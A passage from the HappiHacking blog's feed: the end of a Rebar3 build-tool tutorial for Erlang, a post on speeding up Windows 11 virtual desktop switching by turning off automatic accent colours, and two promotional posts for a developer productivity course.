            {test, [... test-specific-options ...
                    ]}
            ]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In addition, if the file &lt;code&gt;rebar.config.script&lt;/code&gt; (an &lt;a href=&quot;https://www.erlang.org/doc/apps/erts/escript_cmd&quot;&gt;Erlang script&lt;/a&gt;) exists,
it will be executed by Rebar3 to perform dynamic configuration.&lt;/p&gt;
&lt;p&gt;There are many other things that can be configured. For a complete list,
see the &lt;a href=&quot;https://rebar3.org/docs/configuration/&quot;&gt;official documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;generated-files&quot; tabindex=&quot;-1&quot;&gt;Generated files&lt;/h2&gt;
&lt;p&gt;Rebar3 does not write into your source directories, and instead outputs all
generated files under a separate directory which by default is named
&lt;code&gt;_build/&lt;/code&gt;. It&#39;s always safe to delete the whole build directory and
recompile everything.&lt;/p&gt;
&lt;h2 id=&quot;source-files&quot; tabindex=&quot;-1&quot;&gt;Source files&lt;/h2&gt;
&lt;p&gt;Rebar3 expects that applications follow the standard &lt;a href=&quot;https://www.erlang.org/doc/system/applications.html#directory-structure&quot;&gt;Erlang application
structure&lt;/a&gt;.
A Rebar3 project can be either a single application with a &lt;code&gt;rebar.config&lt;/code&gt;
file in the project root directory and a &lt;code&gt;src/&lt;/code&gt; subdirectory, or it can
consist of a collection of applications in a subdirectory named &lt;code&gt;apps/&lt;/code&gt;
(alternatively &lt;code&gt;lib/&lt;/code&gt;), with the main &lt;code&gt;rebar.config&lt;/code&gt; in the root directory
and each app having its own &lt;code&gt;src/&lt;/code&gt;. Such a collection is called an
&amp;quot;umbrella project&amp;quot;.&lt;/p&gt;
&lt;p&gt;An umbrella project is usually published as a Release: a complete
Erlang system to run on some target machine. Often, only a top level
&lt;code&gt;rebar.config&lt;/code&gt; file is needed, but individual apps (&lt;code&gt;apps/app1/&lt;/code&gt;,
&lt;code&gt;apps/app2/&lt;/code&gt;, ...) may have their own &lt;code&gt;rebar.config&lt;/code&gt; files in order to use
individual build options, pre- or post-build hooks, etc.&lt;/p&gt;
&lt;p&gt;A single application can be made into a Release but it can also be
published as a standalone library (that others can use as a dependency), or
turned into an &lt;em&gt;escript&lt;/em&gt; (a standalone executable).&lt;/p&gt;
&lt;h2 id=&quot;releases&quot; tabindex=&quot;-1&quot;&gt;Releases&lt;/h2&gt;
&lt;p&gt;A release is a package that can be installed and run on a target machine,
where the operator doesn&#39;t necessarily know anything about the
implementation. When Rebar3 builds a release, typically using a command
like&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;rebar3 as prod release
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;rebar3 as prod tar
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;it puts the files under &lt;code&gt;_build/$PROFILE/rel/$RELNAME&lt;/code&gt;, where &lt;code&gt;$PROFILE&lt;/code&gt; in
this case would be &lt;code&gt;prod&lt;/code&gt; (see Profiles below) and &lt;code&gt;$RELNAME&lt;/code&gt; is taken from
the configuration. A typical release specification in your &lt;code&gt;rebar.config&lt;/code&gt;
looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{relx, [{release, {my_release, &quot;1.0.2&quot;},
         [app1, app2, ...]},
        {sys_config, &amp;quot;./config/sys.config&amp;quot;},
        {vm_args, &amp;quot;./config/vm.args&amp;quot;},
        {overlay, [{copy, &amp;quot;LICENSE&amp;quot; , &amp;quot;LICENSE&amp;quot;},
                   {copy, &quot;docs/README.md&quot;, &quot;docs/README.md&quot;}
                  ]}
       ]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A start script &lt;code&gt;bin/$RELNAME&lt;/code&gt; will be generated automatically, providing
standard CLI commands for your release, like &lt;code&gt;bin/my_release start&lt;/code&gt;. The
listed Erlang apps &lt;code&gt;[app1, app2, ...]&lt;/code&gt; will be included in the release
package and will be launched when the script runs, using the included
&lt;a href=&quot;https://www.erlang.org/docs/20/man/config.html&quot;&gt;&lt;code&gt;sys_config&lt;/code&gt;&lt;/a&gt; and
&lt;a href=&quot;https://www.erlang.org/doc/apps/erts/erl_cmd.html#args_file&quot;&gt;&lt;code&gt;vm_args&lt;/code&gt;&lt;/a&gt;
configuration files.&lt;/p&gt;
&lt;h2 id=&quot;external-dependencies&quot; tabindex=&quot;-1&quot;&gt;External Dependencies&lt;/h2&gt;
&lt;p&gt;Dependencies can be specified either just by name and version, as in
&lt;code&gt;{deps, [{gproc, &amp;quot;0.9.0&amp;quot;},...]}&lt;/code&gt;, in which case they are downloaded via the
&lt;a href=&quot;https://hex.pm/&quot;&gt;Hex package manager&lt;/a&gt;, or as a Git URL, as in &lt;code&gt;{deps, [{cowboy, {git, &amp;quot;https://github.com/ninenines/cowboy.git&amp;quot;, {tag,&amp;quot;2.11.0&amp;quot;}}},...]}&lt;/code&gt;, in which case they are checked out and built. See
Profiles below for details about where the code ends up.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note that listing an app as a dependency does not automatically include
it in the final Release package&lt;/strong&gt; - for that to happen, it must also be
included in the &lt;code&gt;relx&lt;/code&gt; specification (see above). For instance, libraries
only used for building or testing may be listed as dependencies but should
not be in the release spec.&lt;/p&gt;
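&lt;p&gt;As a sketch of this separation (the &lt;code&gt;recon&lt;/code&gt; version shown is illustrative), a debugging library can be fetched as a dependency but deliberately left out of the shipped Release:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Fetched and available during development and testing...
{deps, [{recon, &quot;2.5.6&quot;}]}.

%% ...but only my_app (and its transitive runtime deps) goes
%% into the Release package.
{relx, [{release, {my_release, &quot;1.0.2&quot;}, [my_app]}]}.
&lt;/code&gt;&lt;/pre&gt;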
&lt;p&gt;&lt;strong&gt;However, the &lt;code&gt;relx&lt;/code&gt; section does not need to list every app that should be
included in the Release.&lt;/strong&gt; Each individual app should contain a &lt;a href=&quot;https://www.erlang.org/doc/apps/kernel/app.html&quot;&gt;&lt;code&gt;*.app&lt;/code&gt;
metadata file&lt;/a&gt;, which
lists its runtime dependencies in &lt;code&gt;{applications, ...}&lt;/code&gt;. If an
app &lt;code&gt;a&lt;/code&gt; declares a runtime dependency on app &lt;code&gt;b&lt;/code&gt;, and Rebar3
has been told to include &lt;code&gt;a&lt;/code&gt;, it will automatically include &lt;code&gt;b&lt;/code&gt; as
well, and so on transitively, so the Release package always contains all
apps required to run.&lt;/p&gt;
&lt;p&gt;Conversely, listing an app in the release spec or a &lt;code&gt;*.app&lt;/code&gt; file does not
tell Rebar3 how to find and download that app if it is not part of your
source code - all external dependencies need to be declared in the &lt;code&gt;deps&lt;/code&gt;
section.&lt;/p&gt;
&lt;h3 id=&quot;dependency-pinning&quot; tabindex=&quot;-1&quot;&gt;Dependency pinning&lt;/h3&gt;
&lt;p&gt;When new dependencies have been fetched, Rebar3 updates the &lt;code&gt;rebar.lock&lt;/code&gt;
file with more exact information about the version, such as the Git hash,
not just the branch or tag name used in the &lt;code&gt;deps&lt;/code&gt; declaration. This
file should typically be kept under version control to ensure repeatable
builds. See the &lt;a href=&quot;https://www.rebar3.org/docs/configuration/dependencies/#lock-files&quot;&gt;Rebar3
documentation&lt;/a&gt;
for details.&lt;/p&gt;
&lt;h3 id=&quot;checkout-dependencies-locally-sourced-apps&quot; tabindex=&quot;-1&quot;&gt;Checkout dependencies - locally sourced apps&lt;/h3&gt;
&lt;p&gt;You can also create a subdirectory or symbolic link named &lt;code&gt;_checkouts&lt;/code&gt;,
containing apps or links to apps that you have as local files, maybe not
yet published or committed, such as a library that you&#39;re currently making
changes to. Apps found under &lt;code&gt;_checkouts&lt;/code&gt; take precedence over any other
apps with the same names, even if they already exist under &lt;code&gt;_build&lt;/code&gt;.&lt;/p&gt;
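&lt;p&gt;For example, assuming the library you are hacking on lives in a sibling directory &lt;code&gt;../mylib&lt;/code&gt; (the path is illustrative), you could wire it in like this:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;mkdir -p _checkouts
ln -s ../../mylib _checkouts/mylib
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The next &lt;code&gt;rebar3 compile&lt;/code&gt; will then build your local copy of &lt;code&gt;mylib&lt;/code&gt; instead of any published version.&lt;/p&gt;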
&lt;h2 id=&quot;testing&quot; tabindex=&quot;-1&quot;&gt;Testing&lt;/h2&gt;
&lt;p&gt;There are two main test frameworks in Erlang:
&lt;a href=&quot;https://www.erlang.org/doc/apps/eunit/chapter.html&quot;&gt;EUnit&lt;/a&gt; for lightweight
unit tests, and &lt;a href=&quot;https://www.erlang.org/doc/apps/common_test/introduction.html&quot;&gt;Common
Test&lt;/a&gt; which
is more complex and can do system level testing. To run all EUnit tests in
your applications, say &lt;code&gt;rebar3 eunit&lt;/code&gt;. To run all tests written with Common
Test, say &lt;code&gt;rebar3 ct&lt;/code&gt;.&lt;/p&gt;
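&lt;p&gt;As a minimal sketch of what an EUnit test looks like (the module and function names are just examples), a file &lt;code&gt;test/my_app_tests.erl&lt;/code&gt; could contain:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-module(my_app_tests).
-include_lib(&quot;eunit/include/eunit.hrl&quot;).

%% Any exported zero-arity function whose name ends in _test
%% is picked up automatically by EUnit.
addition_test() -&gt;
    ?assertEqual(4, 2 + 2).
&lt;/code&gt;&lt;/pre&gt;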
&lt;p&gt;Rebar3 will ensure that the Erlang code path is set up to find both your
code and your test suites. You should put Common Test files in a separate
&lt;code&gt;test/&lt;/code&gt; subdirectory of each application. Note that if you want to run
Common Test test code interactively from an Erlang shell, you must start
the shell using the &lt;code&gt;test&lt;/code&gt; profile:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;rebar3 as test shell --start-clean
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;so that Rebar3 will add code paths to the &lt;code&gt;test&lt;/code&gt; subdirectories. See below
for a full explanation of profiles.&lt;/p&gt;
&lt;p&gt;For an umbrella project, you can also place test files in a directory
&lt;code&gt;test/&lt;/code&gt; directly under the project root, for tests that pertain to the
project as a whole rather than to one of its individual apps.&lt;/p&gt;
&lt;p&gt;To run the
&lt;a href=&quot;https://www.erlang.org/doc/apps/dialyzer/dialyzer.html&quot;&gt;Dialyzer&lt;/a&gt; type
analysis tool, say &lt;code&gt;rebar3 dialyzer&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;You can define aliases in &lt;code&gt;rebar.config&lt;/code&gt; to simplify common tasks like
running tests; for example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{alias, [{check, [dialyzer, eunit, ct]}]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;letting you say simply &lt;code&gt;rebar3 check&lt;/code&gt; to run all three.&lt;/p&gt;
&lt;h2 id=&quot;profiles&quot; tabindex=&quot;-1&quot;&gt;Profiles&lt;/h2&gt;
&lt;p&gt;The default profile simply means the &lt;code&gt;rebar.config&lt;/code&gt; without any specific
profile applied. This will be used when you just say e.g. &lt;code&gt;rebar3 compile&lt;/code&gt;.
To apply a profile such as &lt;code&gt;prod&lt;/code&gt; to a command, say &lt;code&gt;rebar3 as prod compile&lt;/code&gt;. You can use any profile names you like, but some names have
special meaning to Rebar3:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;code&gt;prod&lt;/code&gt; profile will automatically apply the &lt;code&gt;prod&lt;/code&gt; &lt;strong&gt;mode&lt;/strong&gt; (see below).&lt;/li&gt;
&lt;li&gt;When running the commands &lt;code&gt;rebar3 eunit&lt;/code&gt; or &lt;code&gt;rebar3 ct&lt;/code&gt;, the profile
named &lt;code&gt;test&lt;/code&gt; will be automatically applied.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For example, if your tests require the &lt;code&gt;meck&lt;/code&gt; library to run, you can add
it as a dependency to only the test profile, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{profiles, [{test, [{deps, [meck]}]}]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id=&quot;where-do-the-files-go&quot; tabindex=&quot;-1&quot;&gt;Where do the files go?&lt;/h3&gt;
&lt;p&gt;When Rebar3 builds things, it puts the generated files under
&lt;code&gt;_build/$PROFILE/&lt;/code&gt;. For example, Erlang apps compiled with &lt;code&gt;rebar3 compile&lt;/code&gt;
end up under &lt;code&gt;_build/default/lib&lt;/code&gt;, but when compiled with &lt;code&gt;rebar3 as prod compile&lt;/code&gt; the files are placed under &lt;code&gt;_build/prod/lib&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;External dependencies, as specified in &lt;code&gt;{deps, ...}&lt;/code&gt;, are treated specially:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;They are &lt;em&gt;always built using their individual &lt;code&gt;prod&lt;/code&gt; profiles&lt;/em&gt;, no matter
what profile Rebar3 has been told to use currently.&lt;/li&gt;
&lt;li&gt;The files are placed under &lt;code&gt;_build/default/lib&lt;/code&gt; (rather than
&lt;code&gt;_build/prod/lib&lt;/code&gt;), because they should be available under the default
profile.&lt;/li&gt;
&lt;li&gt;When Rebar3 builds profiles other than the default, it does not rebuild
the external dependencies. Instead it creates symbolic links from
&lt;code&gt;_build/$PROFILE/lib&lt;/code&gt; to the already built files under
&lt;code&gt;_build/default/lib&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The exception is
dependencies specified as part of an individual profile, as in &lt;code&gt;{profiles, [{test, [{deps, [meck]}]}]}&lt;/code&gt;, which get stored under that profile (in this
case &lt;code&gt;_build/test/lib&lt;/code&gt;) since they should not be available under the
default profile.&lt;/p&gt;
&lt;p&gt;These locations are typically not the final destination for the compiled
files. Usually, they will later get copied into a Release package under
&lt;code&gt;_build/$PROFILE/rel&lt;/code&gt; for distribution as a tarball or similar.&lt;/p&gt;
&lt;h2 id=&quot;modes&quot; tabindex=&quot;-1&quot;&gt;Modes&lt;/h2&gt;
&lt;p&gt;Modes are shortcuts for some basic settings, for example &lt;code&gt;{mode, prod}&lt;/code&gt;
sets some typical options for production. The builtin modes are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;prod&lt;/code&gt;: Include the Erlang Runtime System in the release package, don&#39;t
include source code, and strip any debug information. Copy files into
the release package instead of using symbolic links.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;minimal&lt;/code&gt;: Like &lt;code&gt;prod&lt;/code&gt; but does not include the Erlang Runtime System.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;dev&lt;/code&gt;: The inverse of &lt;code&gt;prod&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In particular, &lt;code&gt;{mode, dev}&lt;/code&gt; implies the &lt;code&gt;{dev_mode, true}&lt;/code&gt; option, which
creates symbolic links instead of copying files when composing a release.
This means that you don&#39;t need to rebuild the release when you make a small
change during development; just recompiling is enough.&lt;/p&gt;
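&lt;p&gt;As a sketch, you can set a mode explicitly in the top-level &lt;code&gt;relx&lt;/code&gt; configuration:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;{relx, [{release, {my_release, &quot;1.0.2&quot;}, [my_app]},
        {mode, dev}]}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A plain &lt;code&gt;rebar3 release&lt;/code&gt; then builds a symlinked dev-mode release, while &lt;code&gt;rebar3 as prod release&lt;/code&gt; applies the &lt;code&gt;prod&lt;/code&gt; mode automatically, as described above.&lt;/p&gt;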
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;We have gone through the most important concepts in Rebar3 and shown how
they interact and where the resulting files end up. We hope this has been
useful to beginners and seasoned programmers alike.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Why Windows 11 Virtual Desktop Switching Is Slow</title>
    <link href="https://happihacking.com/blog/posts/2024/slow_virtual_desktop_switching/"/>
    <updated>2024-12-17T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/slow_virtual_desktop_switching/</id>
    <summary>And How to Fix It</summary>
    <content type="html">&lt;h1 id=&quot;why-windows-11-virtual-desktop-switching-is-slow&quot; tabindex=&quot;-1&quot;&gt;Why Windows 11 Virtual Desktop Switching Is Slow&lt;/h1&gt;
&lt;p&gt;If switching between virtual desktops in Windows 11 feels slow, you&#39;re not alone. The likely cause is the &lt;em&gt;automatic accent color&lt;/em&gt; feature. While it may seem harmless, this feature can significantly impact performance, particularly if you are using multiple monitors or large background images.
&lt;img class=&quot;img-blog center&quot; src=&quot;https://happihacking.com/images/multimonitor2.jpg&quot; alt=&quot;A multi monitor setup&quot; title=&quot;A multi monitor setup&quot; /&gt;&lt;/p&gt;
&lt;h2 id=&quot;a-personal-encounter-with-the-slowdown&quot; tabindex=&quot;-1&quot;&gt;A Personal Encounter with the Slowdown&lt;/h2&gt;
&lt;p&gt;I had been frustrated with the slow virtual desktop switching in Windows 11 for some time. My PC has several virtual desktops: one for each project or company I&#39;m working with, along with one for home and one for gaming. To make it easy to identify which desktop I was on, I set a different background wallpaper for each one.&lt;/p&gt;
&lt;p&gt;My Linux and macOS systems handled desktop switching smoothly, so I couldn&#39;t understand why Windows 11 was struggling.&lt;/p&gt;
&lt;p&gt;While upgrading to Windows 11 24H2 and tidying up my system, I decided to investigate. What I found surprised me.&lt;/p&gt;
&lt;p&gt;Therefore, I created this post to remind myself in the future and possibly assist others seeking answers to this issue.&lt;/p&gt;
&lt;h2 id=&quot;how-automatic-accent-colors-slow-you-down&quot; tabindex=&quot;-1&quot;&gt;How Automatic Accent Colors Slow You Down&lt;/h2&gt;
&lt;p&gt;Automatic accent colors in Windows 11 work by scanning your desktop background to pick a dominant color for the system interface. The idea is to create a visually cohesive experience.&lt;/p&gt;
&lt;p&gt;Here’s the technical breakdown of what happens:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Image Analysis:&lt;/strong&gt; Windows analyzes your current background image.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Color Quantization:&lt;/strong&gt; The system reduces the image to a smaller set of dominant colors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Color Selection:&lt;/strong&gt; It chooses the most prominent hue and sets it as the accent color.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;While this process sounds lightweight, it becomes demanding when you use &lt;strong&gt;large, high-resolution background images&lt;/strong&gt; and especially if you have &lt;strong&gt;multiple monitors&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Every time you switch desktops, Windows recalculates the dominant accent color. For systems with high-resolution images, that’s a lot of pixels to process, which introduces noticeable delays.&lt;/p&gt;
&lt;h3 id=&quot;the-twist-wasted-calculations&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;The Twist: Wasted Calculations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Here’s what made the issue even more absurd on my system: I had the following two settings &lt;em&gt;turned off&lt;/em&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Show accent color on Start and Taskbar&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Show accent color on title bars and window borders&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This means I wasn’t even seeing the accent color most of the time, except in a few subtle UI elements like buttons. Yet, Windows continued recalculating the accent color in the background, wasting resources for a feature I wasn’t actively using.&lt;/p&gt;
&lt;h2 id=&quot;the-fix-disable-automatic-accent-colors&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;The Fix: Disable Automatic Accent Colors&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Thankfully, the fix is simple. By turning off automatic accent colors, you eliminate the unnecessary calculations and speed up virtual desktop switching.&lt;/p&gt;
&lt;p&gt;Here’s how to do it:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Open &lt;strong&gt;Settings&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Go to &lt;strong&gt;Personalization &amp;gt; Colors&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Under &amp;quot;Accent color&amp;quot;, switch the dropdown from &amp;quot;Automatic&amp;quot; to &amp;quot;Manual&amp;quot;.&lt;/li&gt;
&lt;li&gt;Select a manual color of your choice.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;While you’re at it, you can also ensure the following are turned off (if you’re not using them):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Show accent color on Start and Taskbar&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Show accent color on title bars and window borders&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Windows 11’s automatic accent color feature is a nice touch for aesthetics, but it comes at a performance cost, especially if you’re not even using the accent color. By disabling it, you can reclaim snappy desktop switching and stop wasting resources on needless calculations.&lt;/p&gt;
&lt;p&gt;If your virtual desktops are crawling, give this fix a try. You might be surprised at how much faster things feel.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Level Up your Developer Productivity</title>
    <link href="https://happihacking.com/blog/posts/2024/gen_z_dev_course/"/>
    <updated>2024-11-26T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/gen_z_dev_course/</id>
    <summary>A New Course by HappiHacking</summary>
    <content type="html">&lt;h1 id=&quot;level-up-your-dev-game-from-bug-fixes-to-big-wins&quot; tabindex=&quot;-1&quot;&gt;Level Up Your Dev Game: From Bug Fixes to Big Wins&lt;/h1&gt;
&lt;p&gt;Hey, Gen-Z coders! You’re the digital natives, the champions of TikTok tutorials and side hustle startups.
But let’s be real: even the savviest tech wizard can feel stuck in the grind of endless sprints, debugging nightmares, and overwhelming to-do lists.
Fear not: our new course, &lt;em&gt;Developer Productivity Mastery&lt;/em&gt;, is here to help you slay the grind and reclaim your time, focus, and sanity.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;whats-this-course-all-about&quot; tabindex=&quot;-1&quot;&gt;What’s This Course All About?&lt;/h2&gt;
&lt;p&gt;Think of this course as your all-in-one productivity toolkit. It’s designed to help you find motivation, build habits, and master your workflow like the true boss you are.
Whether you’re managing your first big project or juggling a side hustle while learning Rust at 2 AM, we’ve got you covered.&lt;/p&gt;
&lt;p&gt;This isn’t some cookie-cutter “time management” fluff. It’s practical, actionable, and packed with the kind of hacks you’d DM your squad about.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;the-modules-thatll-change-your-dev-life&quot; tabindex=&quot;-1&quot;&gt;The Modules That’ll Change Your Dev Life&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;“Developer Productivity Mastery”&lt;/strong&gt; includes six power-packed modules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Module 1: Developer Motivation - Finding Your Why&lt;/strong&gt;
Learn to code with purpose and map out your career like the hero of an epic video game.
Spoiler: You’re also unlocking mentor-level skills to help others level up.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Module 2: Building Productive Habits and Routines&lt;/strong&gt;
Create habits that stick, so you can stop procrastinating and start thriving.
Yes, we’ll teach you how to actually finish that side project.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Module 3: Effective Time Management and Prioritization&lt;/strong&gt;
Master time-blocking, kill distractions, and finally hit that flow state you’ve been chasing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Module 4: Mastering Workflow Optimization and Automation&lt;/strong&gt;
Automate the boring stuff, optimize your tools, and learn how to work smarter, not harder.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Module 5: Building Better Collaboration and Communication&lt;/strong&gt;
Get the skills to lead your team, ace code reviews, and write documentation that doesn’t make your future self cry.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Module 6: Tools, Tricks, and Hacks for Better Development&lt;/strong&gt;
Shortcut your way to success with tips, tricks, and hacks for better coding and faster deployment.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;why-youll-love-it&quot; tabindex=&quot;-1&quot;&gt;Why You’ll Love It&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;No Boring Theory&lt;/strong&gt;
This is for the devs who want action, not lectures. Everything in the course is practical, relatable, and easy to implement, even if you’re running on caffeine and vibes.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Focus on Your Why&lt;/strong&gt;
Module 1 helps you define your goals so clearly that every commit, PR, and merge feels like a step toward your dream. You’ll leave this course as someone with a clear purpose in tech, and in life.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Tools to Slay the Grind&lt;/strong&gt;
Modules 4 and 6 are like cheat codes for productivity. Whether it’s automating your workflows or discovering the best IDE plugins, we’ve got the hacks to keep your focus on what truly matters.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Next-Level Collaboration&lt;/strong&gt;
Gen-Z doesn’t work in silos, and neither should you. Module 5 is all about turning your communication and teamwork skills into superpowers. Say goodbye to awkward Slack messages and hello to leading your squad to glory.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;easter-eggs-for-the-meme-lords&quot; tabindex=&quot;-1&quot;&gt;Easter Eggs for the Meme Lords&lt;/h3&gt;
&lt;p&gt;We’ve packed the course with references you’ll love, from low-key nods to your favorite memes to challenges that feel more like side quests than chores. Productivity has never been this fun.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;what-youll-leave-with&quot; tabindex=&quot;-1&quot;&gt;What You’ll Leave With&lt;/h3&gt;
&lt;p&gt;When you finish this course, you’ll not only have streamlined your workflows but also boosted your confidence and clarity. Whether it’s your startup, your day job, or your dream side hustle, you’ll be ready to crush it like a boss.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;are-you-ready-to-level-up&quot; tabindex=&quot;-1&quot;&gt;Are You Ready to Level Up?&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;Developer Productivity Mastery&lt;/em&gt; is the boost your dev life needs. Sign up now and start your journey from chaos to controlled mastery. Think of it as the productivity glow-up you didn’t know you needed, but will never want to code without.&lt;/p&gt;
&lt;p&gt;Email &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt; now to start slaying your dev grind like a pro! 🚀&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Mastering Developer Productivity</title>
    <link href="https://happihacking.com/blog/posts/2024/gen_x_dev_course/"/>
    <updated>2024-11-26T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/gen_x_dev_course/</id>
    <summary>A New Course by HappiHacking</summary>
    <content type="html">&lt;h1 id=&quot;from-gen-x-to-gen-excellence-a-developers-journey-to-productivity&quot; tabindex=&quot;-1&quot;&gt;From Gen-X to Gen-Excellence: A Developer&#39;s Journey to Productivity&lt;/h1&gt;
&lt;p&gt;Ah, Gen-X developers-the unsung heroes of the tech revolution.
You’re the bridge between punch cards and AI, the masterminds who survived the floppy disk apocalypse and witnessed the rise of the Internet in all its pixelated glory. But let’s face it: even the most seasoned coder can hit the dreaded &lt;em&gt;daily grind&lt;/em&gt; wall. Fear not, because &lt;em&gt;Mastering Developer Productivity&lt;/em&gt; is here to rekindle your spark, one Easter egg and Gen-X meme at a time.&lt;/p&gt;
&lt;h2 id=&quot;whats-this-course-all-about&quot; tabindex=&quot;-1&quot;&gt;What’s This Course All About?&lt;/h2&gt;
&lt;p&gt;It’s a call to action for developers stuck in the limbo of maintenance tasks, endless bug fixes, and chaotic Jira boards.
Remember the thrill of your first &lt;code&gt;Hello World&lt;/code&gt; program?
This course brings that magic back, guiding you through the essentials of motivation, workflow optimization, and habits that stick, because let’s admit it: old habits don’t just die hard; they respawn harder.&lt;/p&gt;
&lt;h3 id=&quot;course-overview&quot; tabindex=&quot;-1&quot;&gt;Course Overview&lt;/h3&gt;
&lt;p&gt;The new course, “Developer Productivity Mastery,” consists of six practical and empowering modules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Module 1: Developer Motivation - Finding Your Why
Rediscover your purpose and craft your personal hero’s journey, ultimately preparing you to step into the role of a mentor.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Module 2: Building Productive Habits and Routines
Learn how to establish habits that align with your goals for consistent focus and productivity.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Module 3: Effective Time Management and Prioritization
Master time-blocking, prioritization, and strategies to minimize distractions.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Module 4: Mastering Workflow Optimization and Automation
Discover how to eliminate bottlenecks, streamline workflows, and embrace automation tools.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Module 5: Building Better Collaboration and Communication
Hone your teamwork and communication skills for better collaboration and code reviews.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Module 6: Tools, Tricks, and Hacks for Better Development
Supercharge your development with insider tips, IDE extensions, and coding shortcuts.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
